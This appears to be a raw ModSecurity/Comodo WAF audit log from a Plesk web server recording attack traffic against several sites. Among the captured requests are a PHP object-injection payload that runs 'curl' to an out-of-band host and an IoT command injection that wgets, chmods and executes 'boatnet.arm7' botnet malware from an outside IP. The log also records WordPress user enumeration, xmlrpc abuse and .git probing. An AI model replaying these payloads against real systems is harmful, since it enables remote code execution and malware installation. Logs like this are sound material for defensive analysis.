(CVE-2013-0235)|Source 13.201.31.180 (76+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 13.201.31.180 (76+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id "aE5gCPzELXyWJtk-RXdEIAAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749966856892036 320171 (- - -) Stopwatch2: 1749966856892036 320171; combined=2265, p1=398, p2=1313, p3=60, p4=60, p5=264, sr=111, sw=170, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --07da9734-Z-- --6b25660b-A-- [15/Jun/2025:11:25:16.409559 +0530] aE5gRPZLNtGrhJkyGMO9bQAAAAs 13.201.31.180 37530 127.0.0.1 7081 --6b25660b-B-- POST //xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 13.201.31.180 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 493 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Content-Type: application/xml --6b25660b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --6b25660b-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 13.201.31.180 (13+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 13.201.31.180 (13+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id "aE5gRPZLNtGrhJkyGMO9bQAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749966916126474 283142 (- - -) Stopwatch2: 1749966916126474 283142; combined=2184, p1=348, p2=1478, p3=47, p4=49, p5=164, sr=99, sw=98, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6b25660b-Z-- --54712940-A-- [15/Jun/2025:11:25:47.878005 +0530] aE5gY4VMjG_Zv7b9NpIJJQAAAAA 179.43.150.26 39590 127.0.0.1 7081 --54712940-B-- GET /wp-json/lp/v1/load_content_via_ajax/?callback=%7B%22class%22:%22LP_Helper%22,%22method%22:%22maybe_unserialize%22%7D&args=O%3a13%3a%22WP_HTML_Token%22%3a2%3a%7bs%3a13%3a%22bookmark_name%22%3bs%3a64%3a%22curl+https://d14ciomr702j5itljehgz9ukjb7tewipt.oast.onlinerandom_string%22%3bs%3a10%3a%22on_destroy%22%3bs%3a6%3a%22system%22%3b%7d HTTP/1.0 Host: archangle.cstechns.com X-Real-IP: 179.43.150.26 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: curl/8.5.0 accept: */* --54712940-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: User-Agent Connection: close Content-Type: text/html; charset=UTF-8 --54712940-H-- Message: Warning. Pattern match "(?:JDatabaseDriverMysqli|[oOcC]\\:\\d+\\:.+?\\:\\d+\\:\\{.{0,399}\\})" at ARGS:args. [file "/etc/apache2/modsecurity.d/rules/comodo_free/24_Apps_Joomla.conf"] [line "79"] [id "222390"] [rev "6"] [msg "COMODO WAF: PHP Injection Attack: Serialized Object Injection in the Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 (CVE-2015-8562)||archangle.cstechns.com|F|2"] [data "Matched Data: O:13:\x22WP_HTML_Token\x22:2:{s:13:\x22bookmark_name\x22;s:64:\x22curl https://d14ciomr702j5itljehgz9ukjb7tewipt.oast.onlinerandom_string\x22;s:10:\x22on_destroy\x22;s:6:\x22system\x22;} found within ARGS:args: O:13:\x22WP_HTML_Token\x22:2:{s:13:\x22bookmark_name\x22;s:64:\x22curl https://d14ciomr702j5itljehgz9ukjb7tewipt.oast.onlinerandom_string\x22;s:10:\x22on_destroy\x22;s:6:\x22system\x22;}"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Pattern match "(?:JDatabaseDriverMysqli|[oOcC]\\\\\\\\:\\\\\\\\d+\\\\\\\\:.+?\\\\\\\\:\\\\\\\\d+\\\\\\\\:\\\\\\\\{.{0,399}\\\\\\\\})" at ARGS:args. [file "/etc/apache2/modsecurity.d/rules/comodo_free/24_Apps_Joomla.conf"] [line "79"] [id "222390"] [rev "6"] [msg "COMODO WAF: PHP Injection Attack: Serialized Object Injection in the Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 (CVE-2015-8562)||archangle.cstechns.com|F|2"] [data "Matched Data: O:13:\\\\x22WP_HTML_Token\\\\x22:2:{s:13:\\\\x22bookmark_name\\\\x22;s:64:\\\\x22curl https://d14ciomr702j5itljehgz9ukjb7tewipt.oast.onlinerandom_string\\\\x22;s:10:\\\\x22on_destroy\\\\x22;s:6:\\\\x22system\\\\x22;} found within ARGS:args: O:13:\\\\x22WP_HTML_Token\\\\x22:2:{s:13:\\\\x22bookmark_name\\\\x22;s:64:\\\\x22curl https://d14ciomr702j5itljehgz9ukjb7tewipt.oast.onlinerandom_string\\\\x22;s:10:\\\\x22on_destroy\\\\x22;s:6:\\\\x22system\\\\x22;}"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] [hostname "archangle.cstechns.com"] [uri "/wp-json/lp/v1/load_content_via_ajax/"] [unique_id "aE5gY4VMjG_Zv7b9NpIJJQAAAAA"] Apache-Error: [file "mod_proxy_fcgi.c"] [line 896] [level 3] AH01071: Got error 'PHP message: PHP Warning: include_once(/var/www/vhosts/cstechns.com/archangle.cstechns.com/wp-content/plugins/extension-for-animation-addons/inc/extensions/wcf-portfolio-filter.php): Failed to open stream: No such file or directory in /var/www/vhosts/cstechns.com/archangle.cstechns.com/wp-content/plugins/extension-for-animation-addons/class-plugin.php on line 323; PHP message: PHP Warning: include_once(): Failed opening '/var/www/vhosts/cstechns.com/archangle.cstechns.com/wp-content/plugins/extension-for-animation-addons/inc/extensions/wcf-portfolio-filter.php' for inclusion (include_path='.:/opt/plesk/php/8.3/share/pear') in /var/www/vhosts/cstechns.com/archangle.cstechns.com/wp-content/plugins/extension-for-animation-addons/class-plugin.php on line 323; PHP message: PHP Warning: include_once(/var/www/vhosts/cstechns.com/archangle.cstechns.com/wp-content/plugins/extension-for-animation-addons/inc/extensions/wcf-gallery-filter.php): Failed to open stream: No such file or directory in /var/www/vhosts/cstechns.com/archangle.cstechns.com/wp-content/plugins/extension-for-animation-addons/class-plugin.php on line 323; PHP message: PHP Warning: include_once(): Failed opening '/var/www/vhosts/cstechns.com/archangle.cstechns.com/wp-content/plugins/extension-for-animation-addons/inc/extensions/wcf-gallery-filter.php' for inclusion (include_path='.:/opt/plesk/php/8.3/share/pear') in /var/www/vhosts/cstechns.com/archangle.cstechns.com/wp-content/plugins/extension-for-animation-addons/class-plugin.php on line 323; PHP message: PHP Fatal error: Cannot declare class WCFAddonsPro\\\\Plugin, because the name is already in use in /var/www/vhosts/cstechns.com/archangle.cstechns.com/wp-content/plugins/animation-addons-for-elementor-pro/class-plugin.php on line 15' Apache-Handler: proxy:unix:/var/www/vhosts/system/archangle.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749966947135176 742897 (- - -) Stopwatch2: 1749966947135176 742897; combined=4157, p1=391, p2=3565, p3=0, p4=0, p5=201, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --54712940-Z-- --a24cc777-A-- [15/Jun/2025:11:27:00.312782 +0530] aE5gqi7IKUqG672kqSyyCAAAAAg 198.71.51.75 43826 127.0.0.1 7081 --a24cc777-B-- GET /.git/branches/ HTTP/1.0 Host: www.futuronomics.com X-Real-IP: 198.71.51.75 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: WP Rocket/Preload Accept: */* Accept-Encoding: deflate, gzip, br, zstd --a24cc777-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Link: <https://www.futuronomics.com/wp-json/>; rel="https://api.w.org/", <https://www.futuronomics.com/wp-json/wp/v2/media/4005>; rel="alternate"; title="JSON"; type="application/json", <https://www.futuronomics.com/?p=4005>; rel=shortlink Set-Cookie: wpr_guest_token=8759031eae479edc71ba2e1b23ab9a669caac9fd4f04fe195a68519e226258bd; expires=Sun, 15 Jun 2025 06:56:59 GMT; Max-Age=3600; path=/; secure; HttpOnly Vary: Accept-Encoding Last-Modified: Sun, 15 Jun 2025 05:57:00 GMT Content-Encoding: gzip Content-Length: 20860 Connection: close Content-Type: text/html; charset=UTF-8 --a24cc777-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.futuronomics.com"] [uri "/.git/branches/"] [unique_id "aE5gqi7IKUqG672kqSyyCAAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/futuronomics.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749967018679446 1633434 (- - -) Stopwatch2: 1749967018679446 1633434; combined=1646, p1=359, p2=1186, p3=0, p4=0, p5=101, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a24cc777-Z-- --c032eb05-A-- [15/Jun/2025:11:30:19.835506 +0530] aE5hcy7IKUqG672kqSyyawAAAAg 91.107.172.71 37166 127.0.0.1 7080 --c032eb05-B-- POST / HTTP/1.0 Host: www.deckstory.com X-Real-IP: 91.107.172.71 Connection: close Content-Length: 7722 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 14_2 like Mac OS X) AppleWebKit/600.2.12 (KHTML, like Gecko) Version/12.3.47 Mobile/KVBEIG Safari/544.15.4 Content-Type: text/csv Cookie: remotebmsess=YcTsYL7tmnQLZUf4JE2f3XzGmLjNkKWaK4+Y1RVGj40U6uwRmjGDtAOAfzf1OfsQPk0i/Dl4YYBK5iNqTXOHgneUY0ap7p0qbIH5Ozrr67wahMFPlLDB8kChh7FybKWnf1mUAF0ilIljhrUN9KcgsopKFedztBhaQgnSXCwlPiTmood61prcE7yBEnv+t4UdnBm+j7+5ktrfTEBL++FgC7JcKI+vdKKxZ4eY0xM6f503Gtsf63ELO0Zvxz4c2v0Us7rtM54Tcw08Uv8npGNDqm7lUOe8Iq6LFTQ/Gzc4nwDsglmzvBWqfeFzuB+PRhit6vUbUptAG8J5VzH5rnzFUwSC+poK4FQoKxtjHUeqEg6+doKoARwNQt4NFlNrn9ToAwm9zvZBrgNNZM0yt+TlG6w7qKU4xlcn75WYkU+HZGzegJ+j/R4dr+hWr9raF8Xn3FAKXGmTJTNIdgekZJt46dE= Accept-Encoding: gzip --c032eb05-F-- HTTP/1.1 200 OK Last-Modified: Thu, 25 Jul 2024 06:55:03 GMT ETag: "67a-61e0cdfc5ffc0-gzip" Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 813 Connection: close Content-Type: text/html --c032eb05-E-- <!doctype html> <html lang="en"> <head> <meta charset="utf-8"> <title>Web Server's Default Page</title> <meta name="copyright" content="Copyright 1999-2024. WebPros International GmbH. All rights reserved."> <script src="https://assets.plesk.com/static/default-website-content/public/default-server-index.js"></script> </head> <body> <h2>What is Plesk</h2> <p> Plesk is a <a href="https://www.plesk.com">hosting panel</a> with simple and secure web server, website and web apps management tools. It is specially designed to help web professionals manage web, DNS, mail and other services through a comprehensive and user-friendly GUI. Plesk is about intelligently managing servers, apps, websites and hosting businesses, on both traditional and cloud hosting. </p> <p> <a href="https://docs.plesk.com/try-plesk-now/">Try Plesk Now!</a> </p> <ul> <li><a href="https://docs.plesk.com/en-US/obsidian/">Plesk Guides</a></li> <li><a href="https://support.plesk.com/hc/en-us">Knowledge Base</a></li> <li><a href="https://talk.plesk.com/">Forum</a></li> <li><a href="https://www.plesk.com/blog/">Blog</a></li> <li><a href="https://www.youtube.com/channel/UCeU-_6YHGQFcVSHLbEXLNlA/playlists">Video Guides</a></li> <li><a href="https://www.facebook.com/Plesk">Facebook</a></li> </ul> <p>Do you host WordPress sites outside of Plesk? Try <a href="https://wpguardian.io/">WP Guardian</a> - it provides complete visibility into the health of your WordPress websites in one place and keeps them protected with flexible updates management</p> </body> </html> --c032eb05-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.deckstory.com|F|2"] [data "TX:0=text/csv"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.deckstory.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.deckstory.com|F|2"] [data "TX:0=text/csv"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.deckstory.com"] [uri "/"] [unique_id "aE5hcy7IKUqG672kqSyyawAAAAg"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.deckstory.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "www.deckstory.com"] [uri "/index.html"] [unique_id "aE5hcy7IKUqG672kqSyyawAAAAg"] Stopwatch: 1749967219831549 4043 (- - -) Stopwatch2: 1749967219831549 4043; combined=2640, p1=466, p2=1957, p3=29, p4=101, p5=86, sr=98, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c032eb05-Z-- --20b3ac38-A-- [15/Jun/2025:11:38:01.015722 +0530] aE5jQYVMjG_Zv7b9NpIKggAAAAA 144.172.103.59 60642 127.0.0.1 7080 --20b3ac38-B-- POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F160.187.246.150%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 144.172.103.59 Connection: close Accept-Encoding: gzip, deflate Accept: */* User-Agent: Mozila/5.0 Cookie: uid=1 --20b3ac38-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --20b3ac38-E-- --20b3ac38-H-- Message: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/apache2/modsecurity.d/rules/comodo_free/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||198.71.51.75|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/apache2/modsecurity.d/rules/comodo_free/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||198.71.51.75|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] [hostname "198.71.51.75"] [uri "/device.rsp"] [unique_id "aE5jQYVMjG_Zv7b9NpIKggAAAAA"] Stopwatch: 1749967681010082 5714 (- - -) Stopwatch2: 1749967681010082 5714; combined=4245, p1=499, p2=3581, p3=41, p4=37, p5=86, sr=102, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --20b3ac38-Z-- --1feed91e-A-- [15/Jun/2025:11:41:51.708380 +0530] aE5kJg2pbpddt_O7FYy5-wAAAAc 3.139.204.243 46062 127.0.0.1 7081 --1feed91e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 3.139.204.243 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: gzip, deflate, br Cookie: wordpress_test_cookie=WP%20Cookie%20check Referer: https://www.dealsdray.com/wp-json/wp/v2/users/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1feed91e-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.dealsdray.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --1feed91e-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.dealsdray.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE5kJg2pbpddt_O7FYy5-wAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749967910543840 1164642 (- - -) Stopwatch2: 1749967910543840 1164642; combined=2163, p1=324, p2=1674, p3=0, p4=0, p5=165, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1feed91e-Z-- --4d169c4c-A-- [15/Jun/2025:11:42:03.493516 +0530] aE5kMhmnVjDRYaxdCWSxXwAAAAY 186.232.112.90 34290 127.0.0.1 7081 --4d169c4c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 186.232.112.90 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: gzip, deflate, br Cookie: wordpress_test_cookie=WP%20Cookie%20check Referer: https://www.dealsdray.com/wp-json/wp/v2/users/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4d169c4c-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.dealsdray.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --4d169c4c-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.dealsdray.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE5kMhmnVjDRYaxdCWSxXwAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749967922506937 986666 (- - -) Stopwatch2: 1749967922506937 986666; combined=2117, p1=349, p2=1673, p3=0, p4=0, p5=95, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4d169c4c-Z-- --93aa9951-A-- [15/Jun/2025:11:42:13.772183 +0530] aE5kPPZLNtGrhJkyGMO_ZgAAAAs 103.93.177.74 48506 127.0.0.1 7081 --93aa9951-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 103.93.177.74 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: gzip, deflate, br Cookie: wordpress_test_cookie=WP%20Cookie%20check Referer: https://www.dealsdray.com/wp-json/wp/v2/users/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --93aa9951-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.dealsdray.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --93aa9951-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.dealsdray.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE5kPPZLNtGrhJkyGMO_ZgAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749967932703336 1068922 (- - -) Stopwatch2: 1749967932703336 1068922; combined=2449, p1=332, p2=2011, p3=0, p4=0, p5=105, sr=93, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --93aa9951-Z-- --66955c4f-A-- [15/Jun/2025:11:42:21.685400 +0530] aE5kRJX6T5jLdIl-tq4u6gAAAAM 216.10.249.85 59732 127.0.0.1 7081 --66955c4f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 216.10.249.85 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: gzip, deflate, br Cookie: wordpress_test_cookie=WP%20Cookie%20check Referer: https://www.dealsdray.com/wp-json/wp/v2/users/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --66955c4f-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.dealsdray.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --66955c4f-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.dealsdray.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE5kRJX6T5jLdIl-tq4u6gAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749967940678979 1006506 (- - -) Stopwatch2: 1749967940678979 1006506; combined=2819, p1=420, p2=2283, p3=0, p4=0, p5=116, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --66955c4f-Z-- --aedebc53-A-- [15/Jun/2025:11:42:30.274134 +0530] aE5kTfZLNtGrhJkyGMO_dgAAAAs 45.174.88.112 60784 127.0.0.1 7081 --aedebc53-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 45.174.88.112 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: gzip, deflate, br Cookie: wordpress_test_cookie=WP%20Cookie%20check Referer: https://www.dealsdray.com/wp-json/wp/v2/users/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --aedebc53-F-- HTTP/1.1 401 Unauthorized 